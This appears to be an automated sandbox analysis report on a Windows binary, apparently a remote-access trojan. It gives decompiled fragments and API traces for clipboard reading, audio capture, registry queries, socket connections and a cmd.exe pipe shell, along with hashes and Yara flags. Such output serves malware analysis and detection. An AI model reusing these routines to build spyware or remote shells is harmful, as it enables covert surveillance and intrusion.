                                    • Part of subcall function 0041203B: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,Q@,?), ref: 004120B8
                                    • Part of subcall function 0041203B: printf.MSVCRT ref: 004120BF
                                    • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120CB
                                    • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120D4
                                    • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120DD
                                    • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120E6
                                    • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120EF
                                    • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120F8
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Similarity
                                  • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$D@2@@0@Hstd@@V?$basic_string@$??0?$basic_string@D@1@@V10@$?c_str@?$basic_string@LocalTimeV10@0@V10@@printf
                                  • String ID: KeepAlive Disabled!$[WARNING]
                                  • API String ID: 2944585167-3856563802
                                  • Opcode ID: 98d74f14f2a3a9b479e6948a5678522134b56ef532e3f160f0c8c38e83814790
                                  • Instruction ID: a30e930004435671851b5eafd83b9c9ec9f6d71b75df5e3fdd77de3efe23ec90
                                  • Opcode Fuzzy Hash: 98d74f14f2a3a9b479e6948a5678522134b56ef532e3f160f0c8c38e83814790
                                  • Instruction Fuzzy Hash: F3F027705103187FEB10B729C94EBEE7F8C8742354F40006AEC11532C1E6F9A9C486EA
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(invalid vector<T> subscript,?,?,?,?,?,?,00401826,004140D8,0041BCB0,?,00408D8A,00000003,00000000), ref: 004018A7
                                  • ??0out_of_range@std@@QAE@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@1@@Z.MSVCP60(0041BCB0,?,?,?,?,?,00401826,004140D8,0041BCB0,?,00408D8A,00000003,00000000), ref: 004018B4
                                  • _CxxThrowException.MSVCRT(?,00416F28), ref: 004018C3
                                    • Part of subcall function 0040190F: ??2@YAPAXI@Z.MSVCRT ref: 0040191F
                                  Strings
                                  • invalid vector<T> subscript, xrefs: 004018A2
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Similarity
                                  • API ID: V?$allocator@$D@std@@U?$char_traits@$??0?$basic_string@??0out_of_range@std@@??2@D@1@@D@2@@1@@D@2@@std@@ExceptionThrowV?$basic_string@
                                  • String ID: invalid vector<T> subscript
                                  • API String ID: 1986322901-3016609489
                                  • Opcode ID: 2e9354e5990b536fab42c5ed924f0a28d80902484f77cec2bc6a0e7e6b145e84
                                  • Instruction ID: dbd3af195aa641a4d32eff83d77deebdd7394ec7269c4e3ee2ba11d1d7788022
                                  • Opcode Fuzzy Hash: 2e9354e5990b536fab42c5ed924f0a28d80902484f77cec2bc6a0e7e6b145e84
                                  • Instruction Fuzzy Hash: 0FE0E57145430EBBDF04FBE1DD46DEDB77CAB14745F100016F50062091FA75A6598769
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(invalid vector<T> subscript,?,00000000,0041B8D8,?,00404EDA,00000000,00000004,0041B310,?,?,?,0040E3FF,00000000), ref: 0040501E
                                  • ??0out_of_range@std@@QAE@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@1@@Z.MSVCP60(?,?,00404EDA,00000000,00000004,0041B310,?,?,?,0040E3FF,00000000), ref: 0040502B
                                  • _CxxThrowException.MSVCRT(?,00416F28), ref: 0040503A
                                  Strings
                                  • invalid vector<T> subscript, xrefs: 00405019
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Similarity
                                  • API ID: V?$allocator@$D@std@@U?$char_traits@$??0?$basic_string@??0out_of_range@std@@D@1@@D@2@@1@@D@2@@std@@ExceptionThrowV?$basic_string@
                                  • String ID: invalid vector<T> subscript
                                  • API String ID: 3609083747-3016609489
                                  • Opcode ID: f2318338d56b632758377919ba935548815a1a15df351b5bf930e86c92a347c4
                                  • Instruction ID: 9be96ab786121cdca3df7d0b72c820f15abd94e2066078dc6746ba185848b686
                                  • Opcode Fuzzy Hash: f2318338d56b632758377919ba935548815a1a15df351b5bf930e86c92a347c4
                                  • Instruction Fuzzy Hash: ADD0127181030FFBCF00FBE0DD49CEDB77CAA04709B100015B511A3054FA74A64E8B69
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00412019() {
                                  				_Unknown_base(*)()* _t2;
                                  
                                  				_t2 = GetProcAddress(LoadLibraryA("User32.dll"), "GetLastInputInfo");
                                  				 *0x41c1dc = _t2;
                                  				return _t2;
                                  			}

                                  APIs
                                  • LoadLibraryA.KERNEL32(User32.dll,GetLastInputInfo), ref: 00412028
                                  • GetProcAddress.KERNEL32(00000000), ref: 0041202F
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Similarity
                                  • API ID: AddressLibraryLoadProc
                                  • String ID: GetLastInputInfo$User32.dll
                                  • API String ID: 2574300362-1519888992
                                  • Opcode ID: 309a20106e4e73e8368ae1d4b5b3144523e47d6202d84086a94c943d5948cba1
                                  • Instruction ID: 4254d4a464572d01fe3095e43ecaf4df99145fa2531fe7b32d94017085124a09
                                  • Opcode Fuzzy Hash: 309a20106e4e73e8368ae1d4b5b3144523e47d6202d84086a94c943d5948cba1
                                  • Instruction Fuzzy Hash: F2C09B709D0650FB86011FA0AD1DBD83B15664B745721C933B902F5251CBB8D080EF1D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E0040F4AE() {
                                  				_Unknown_base(*)()* _t2;
                                  
                                  				_t2 = GetProcAddress(GetModuleHandleA("User32.dll"), "GetCursorInfo");
                                  				 *0x41bf1c = _t2;
                                  				return _t2;
                                  			}

                                  APIs
                                  • GetModuleHandleA.KERNEL32(User32.dll,GetCursorInfo), ref: 0040F4BD
                                  • GetProcAddress.KERNEL32(00000000), ref: 0040F4C4
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Similarity
                                  • API ID: AddressHandleModuleProc
                                  • String ID: GetCursorInfo$User32.dll
                                  • API String ID: 1646373207-2714051624
                                  • Opcode ID: 4448927a859271910f0b75d11c3b5b646031b719c8466c7563d1e3f86e814f60
                                  • Instruction ID: c5b485f27e89021cea1a89f12a6954dfd40793fe5a01e249b662889bc5cfc0be
                                  • Opcode Fuzzy Hash: 4448927a859271910f0b75d11c3b5b646031b719c8466c7563d1e3f86e814f60
                                  • Instruction Fuzzy Hash: F0C04C75551600A686005FA1BC0D6D53A14A956745711C436B802B1255CB7C41459E5D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00413AED() {
                                  				_Unknown_base(*)()* _t2;
                                  
                                  				_t2 = GetProcAddress(LoadLibraryA("kernel32.dll"), "GetConsoleWindow");
                                  				 *0x41c1f8 = _t2;
                                  				return _t2;
                                  			}

                                  APIs
                                  • LoadLibraryA.KERNEL32(kernel32.dll,GetConsoleWindow), ref: 00413AFC
                                  • GetProcAddress.KERNEL32(00000000), ref: 00413B03
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Similarity
                                  • API ID: AddressLibraryLoadProc
                                  • String ID: GetConsoleWindow$kernel32.dll
                                  • API String ID: 2574300362-100875112
                                  • Opcode ID: 9955e51fb7636a0590f3210687e67071c6be7c6c5ddc6a030eb57b0b1f68f6e2
                                  • Instruction ID: 6ee53b0f0035eccf7fe7e145557d43f0b39688fed8dbf49153f7f93891f0b47b
                                  • Opcode Fuzzy Hash: 9955e51fb7636a0590f3210687e67071c6be7c6c5ddc6a030eb57b0b1f68f6e2
                                  • Instruction Fuzzy Hash: 83C09BB4AD1611FB86015FA0BC4EAC87B145A46707332C077781191255DA7880C45A1D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 79%
                                  			E0040B615(void* __ecx, intOrPtr _a4, void* _a8, short* _a12, char _a15) {
                                  				int _v8;
                                  				int _v12;
                                  				char* _t31;
                                  				signed int _t36;
                                  				signed int _t37;
                                  				void* _t46;
                                  
                                  				_v8 = 0;
                                  				_t31 = 0x415664;
                                  				if(RegQueryValueExW(_a8, _a12, 0,  &_v12, 0,  &_v8) == 0 && _v8 > 0) {
                                  					_t31 = malloc(_v8);
                                  					_t36 = _v8;
                                  					_t46 = _t31;
                                  					_t37 = _t36 >> 2;
                                  					memset(_t46 + _t37, memset(_t46, 0, _t37 << 2), (_t36 & 0x00000003) << 0);
                                  					RegQueryValueExW(_a8, _a12, 0,  &_v12, _t31,  &_v8);
                                  				}
                                  				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z(_t31,  &_a15);
                                  				return _a4;
                                  			}

                                  APIs
                                  • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0040B63D
                                  • malloc.MSVCRT ref: 0040B64B
                                  • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0040B67A
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00415664,?), ref: 0040B684
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Similarity
                                  • API ID: QueryV?$allocator@Value$??0?$basic_string@G@1@@G@2@@std@@G@std@@U?$char_traits@malloc
                                  • String ID:
                                  • API String ID: 3506253819-0
                                  • Opcode ID: 334642ca9c5921904f617564a68cf70a4dc2ee16bb16387c8e9b5fee4fcdd566
                                  • Instruction ID: 6657ce7e0b4af722a3644f787a918a8cc9d20f3304ca96b666d2b0068cb46159
                                  • Opcode Fuzzy Hash: 334642ca9c5921904f617564a68cf70a4dc2ee16bb16387c8e9b5fee4fcdd566
                                  • Instruction Fuzzy Hash: 3E11097260010DFFDB05DF95DD80DEFBBBDEB88250B10406ABA05D6250D7719E149BA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?), ref: 004028DC
                                    • Part of subcall function 00402038: socket.WS2_32(00000000,00000001,00000006), ref: 00402053
                                    • Part of subcall function 0040209B: connect.WS2_32(0041BE70,0041BE74,00000010), ref: 004020B1
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00402915
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00402928
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0040295E,00000001,00000073), ref: 00402953
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Similarity
                                  • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$V01@@$??0?$basic_string@$??1?$basic_string@??4?$basic_string@V01@connectsocket
                                  • String ID:
                                  • API String ID: 182292213-0
                                  • Opcode ID: e8679a6b84cd13b518d2f85527ac5e7d509b52d12921196b337c3ffbd5f7c91e
                                  • Instruction ID: 3575325012e9a6a69ab12c81105f5cb7c7dcd4fb264b21d23710b3ab9203063c
                                  • Opcode Fuzzy Hash: e8679a6b84cd13b518d2f85527ac5e7d509b52d12921196b337c3ffbd5f7c91e
                                  • Instruction Fuzzy Hash: 0301B97170030867DB00BB76DE4D6EE3A5DDBC5350F40803ABE169B2D1CBB9894483D9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 58%
                                  			E00401181(void* __eflags, signed int _a4) {
                                  				intOrPtr _t16;
                                  				intOrPtr _t17;
                                  				intOrPtr _t19;
                                  				intOrPtr _t22;
                                  				intOrPtr _t28;
                                  				intOrPtr _t29;
                                  				intOrPtr _t30;
                                  				intOrPtr _t31;
                                  				intOrPtr _t32;
                                  				intOrPtr _t33;
                                  				signed int _t36;
                                  
                                  				_t38 = __eflags;
                                  				E0040180C(0x41b200, __eflags, _a4);
                                  				__imp__?resize@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXI@Z( *0x41b1d4);
                                  				_t36 = _a4 << 5;
                                  				_t16 = E0040180C(0x41b200, _t38, _a4);
                                  				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                  				_t28 =  *0x41b1dc; // 0x1422ca8
                                  				 *((intOrPtr*)(_t36 + _t28)) = _t16;
                                  				_t17 =  *0x41b1dc; // 0x1422ca8
                                  				_t29 =  *0x41b1d4; // 0x0
                                  				 *((intOrPtr*)(_t36 + _t17 + 4)) = _t29;
                                  				_t30 =  *0x41b1dc; // 0x1422ca8
                                  				 *((intOrPtr*)(_t36 + _t30 + 8)) = 0;
                                  				_t31 =  *0x41b1dc; // 0x1422ca8
                                  				 *((intOrPtr*)(_t36 + _t31 + 0xc)) = 0;
                                  				_t32 =  *0x41b1dc; // 0x1422ca8
                                  				 *((intOrPtr*)(_t36 + _t32 + 0x10)) = 0;
                                  				_t33 =  *0x41b1dc; // 0x1422ca8
                                  				 *((intOrPtr*)(_t36 + _t33 + 0x14)) = 0;
                                  				_t19 =  *0x41b1dc; // 0x1422ca8
                                  				waveInPrepareHeader( *0x41b198, _t19 + _t36, 0x20);
                                  				_t22 =  *0x41b1dc; // 0x1422ca8
                                  				return waveInAddBuffer( *0x41b198, _t36 + _t22, 0x20);
                                  			}

                                  APIs
                                  • ?resize@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXI@Z.MSVCP60(?,00000000,?,?,0040116A,00000000), ref: 0040119D
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,0040116A,00000000), ref: 004011B5
                                  • waveInPrepareHeader.WINMM(01422CA8,00000020,?,?,0040116A,00000000), ref: 0040120D
                                  • waveInAddBuffer.WINMM(?,00000020,?,?,0040116A,00000000), ref: 00401223
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Similarity
                                  • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@wave$?c_str@?$basic_string@?resize@?$basic_string@BufferHeaderPrepare
                                  • String ID:
                                  • API String ID: 1952094867-0
                                  • Opcode ID: cba3c179512d5eb9509709d99886367f0e09bfaf78f205ade4979b92c6ff8bdb
                                  • Instruction ID: 8f998c45a3acb3b0b10d37a494ac82bd1c86fe74dd73c150e7a1b96005ae6754
                                  • Opcode Fuzzy Hash: cba3c179512d5eb9509709d99886367f0e09bfaf78f205ade4979b92c6ff8bdb
                                  • Instruction Fuzzy Hash: 83111835600644FFCB159F65EC689E67BE6EB89394702C83DED0A87365DB31A801CBD8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 18%
                                  			E0040B5A2(intOrPtr _a4, void* _a8, short* _a12, char _a15, short* _a16) {
                                  				int _v8;
                                  				char _v2056;
                                  
                                  				_v8 = 0x400;
                                  				if(RegOpenKeyExW(_a8, _a12, 0, 0x20019,  &_a8) != 0) {
                                  					_push( &_a15);
                                  					_push(0x415800);
                                  				} else {
                                  					RegQueryValueExW(_a8, _a16, 0, 0,  &_v2056,  &_v8);
                                  					RegCloseKey(_a8);
                                  					_push( &_a15);
                                  					_push( &_v2056);
                                  				}
                                  				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z();
                                  				return _a4;
                                  			}

                                  APIs
                                  • RegOpenKeyExW.ADVAPI32(80000000,?,00000000,00020019,80000000), ref: 0040B5C3
                                  • RegQueryValueExW.ADVAPI32(80000000,00412203,00000000,00000000,?,00000400), ref: 0040B5E2
                                  • RegCloseKey.ADVAPI32(80000000), ref: 0040B5EB
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00415800,?), ref: 0040B60A
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Similarity
                                  • API ID: V?$allocator@$??0?$basic_string@CloseG@1@@G@2@@std@@G@std@@OpenQueryU?$char_traits@Value
                                  • String ID:
                                  • API String ID: 4081865614-0
                                  • Opcode ID: fb7ef9b6539aba75acc45a89fbd2bb87bc1b0fcb06b4154e7f789d8a22b8fd0a
                                  • Instruction ID: 08c4fdd74f089b672de4800a8e1209c34edbbd410ac70e3f0c9e675f1f7a205c
                                  • Opcode Fuzzy Hash: fb7ef9b6539aba75acc45a89fbd2bb87bc1b0fcb06b4154e7f789d8a22b8fd0a
                                  • Instruction Fuzzy Hash: 3D01F67554010EFFDB11DF90ED45FDA7BBCFB08304F508062BA05AA1A0D770AA199B98
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 37%
                                  			E0040D87E() {
                                  				char _t9;
                                  				void* _t22;
                                  				void* _t28;
                                  				intOrPtr _t29;
                                  
                                  				__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z(E0040180C(_t22 - 0x10, _t28, 1));
                                  				_t29 =  *0x41b889; // 0x0
                                  				if(_t29 == 0) {
                                  					_t9 = E0040180C(_t22 - 0x10, _t29, 0);
                                  					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z();
                                  					E00402B8A(_t9);
                                  				}
                                  				E004017DD(_t22 - 0x10);
                                  				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                  				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                  				return 0;
                                  			}

                                  APIs
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,00000001), ref: 0040D88E
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 0040D8B1
                                    • Part of subcall function 00402B8A: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 00402BDC
                                    • Part of subcall function 00402B8A: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 00402BFB
                                    • Part of subcall function 00402B8A: ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(0041B860,cmd.exe), ref: 00402C1F
                                    • Part of subcall function 00402B8A: getenv.MSVCRT ref: 00402C34
                                    • Part of subcall function 00402B8A: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00000000), ref: 00402C3E
                                    • Part of subcall function 00402B8A: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00415774), ref: 00402C4B
                                    • Part of subcall function 00402B8A: CreatePipe.KERNEL32(0041B7A0,0041B870,0041B7F0,00000000), ref: 00402C81
                                    • Part of subcall function 00402B8A: CreatePipe.KERNEL32(0041B858,0041B874,0041B7F0,00000000), ref: 00402C9B
                                    • Part of subcall function 00402B8A: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0041B7A8,0041B878), ref: 00402CF2
                                    • Part of subcall function 00402B8A: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,00000000,00000001,00000000,00000000,00000000), ref: 00402D06
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000006B), ref: 0040E6AC
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040E6B5
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??0?$basic_string@V01@$??1?$basic_string@??4?$basic_string@?c_str@?$basic_string@CreateD@1@@PipeV01@@$??8std@@D@2@@0@V?$basic_string@Y?$basic_string@getenv
                                  • String ID:
                                  • API String ID: 187635395-0
                                  • Opcode ID: 450a3559cbae69685aa4108714fcfe19e1a758c696523a106c3012aef2761bb0
                                  • Instruction ID: 95a58a3f9309c0e5762bae13ef1d8417c4b6d23d487987f94e594afc93633c1a
                                  • Opcode Fuzzy Hash: 450a3559cbae69685aa4108714fcfe19e1a758c696523a106c3012aef2761bb0
                                  • Instruction Fuzzy Hash: 22F03A7191011CCBD704BBA6ECA99EE7B34EB64355B404C3BE412A20E1EBB90525CA5D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,0040969A,?,?), ref: 0041359B
                                    • Part of subcall function 00412795: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000020,?,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127A4
                                    • Part of subcall function 00412795: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@IGABV?$allocator@G@1@@Z.MSVCP60(00000000,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127AE
                                    • Part of subcall function 00412795: ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127B7
                                    • Part of subcall function 00412795: ?end@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127C1
                                    • Part of subcall function 00412795: ?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127CB
                                    • Part of subcall function 00412795: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?), ref: 004127E1
                                    • Part of subcall function 00412795: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127EA
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?,?,?,0040969A,?,?), ref: 004135B2
                                    • Part of subcall function 004135DE: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?), ref: 004135EE
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,0040969A,?,?), ref: 004135CA
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,0040969A,?,?), ref: 004135D3
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$G@2@@std@@G@std@@$D@2@@std@@D@std@@$??0?$basic_string@$??1?$basic_string@$?begin@?$basic_string@G@1@@$?c_str@?$basic_string@?end@?$basic_string@?length@?$basic_string@D@1@@V01@@
                                  • String ID:
                                  • API String ID: 384503197-0
                                  • Opcode ID: fc84d7bb029b3800a199890aa7fda8e35941668a1b6b46af4e7b1dfef16bc2af
                                  • Instruction ID: e9850064b0a36303cd24c251ff0e0265422eee26172e2298965a0cd1febf68d2
                                  • Opcode Fuzzy Hash: fc84d7bb029b3800a199890aa7fda8e35941668a1b6b46af4e7b1dfef16bc2af
                                  • Instruction Fuzzy Hash: 30F0DA7141021EEBCF04EFA0EC49CEE7779FB48254B444429F926D20A0EB75A659CB94
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,?,?,00000001,?,?,00000000,00408CAD,00000000), ref: 004030B4
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?), ref: 004030C0
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,00000000), ref: 004030D5
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004030DE
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$D@2@@std@@D@std@@U?$char_traits@$??0?$basic_string@$??1?$basic_string@?c_str@?$basic_string@D@1@@V01@@
                                  • String ID:
                                  • API String ID: 2505548081-0
                                  • Opcode ID: 9697f98c185c8dbb6fe00f519fde4b1936163652de48f83fe795a14545806d9b
                                  • Instruction ID: d80b3b6c6aed89596c133f447bcdc90fdca9c0e00c1408e091cb816f9a065f40
                                  • Opcode Fuzzy Hash: 9697f98c185c8dbb6fe00f519fde4b1936163652de48f83fe795a14545806d9b
                                  • Instruction Fuzzy Hash: A5F0F23240011EEFCF04EF94DC58CEE7B78FF88255B008829F926971A0EB70AA15CB94
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 27%
                                  			E00406BEF(void* __ecx, intOrPtr _a4) {
                                  				char _v5;
                                  				void* _t15;
                                  
                                  				if(OpenClipboard(0) == 0) {
                                  					L3:
                                  					_push( &_v5);
                                  					_push(0x415664);
                                  				} else {
                                  					_t15 = GetClipboardData(1);
                                  					CloseClipboard();
                                  					if(_t15 == 0) {
                                  						goto L3;
                                  					} else {
                                  						_push( &_v5);
                                  						_push(_t15);
                                  					}
                                  				}
                                  				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z();
                                  				return _a4;
                                  			}

                                  APIs
                                  • OpenClipboard.USER32(00000000), ref: 00406BF6
                                  • GetClipboardData.USER32 ref: 00406C02
                                  • CloseClipboard.USER32(?,00406C77,?,?,00000000,00000000,?,?,?,?,?,00405AF6), ref: 00406C0A
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415664,?,?,00406C77,?,?,00000000,00000000,?,?,?,?,?,00405AF6), ref: 00406C27
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
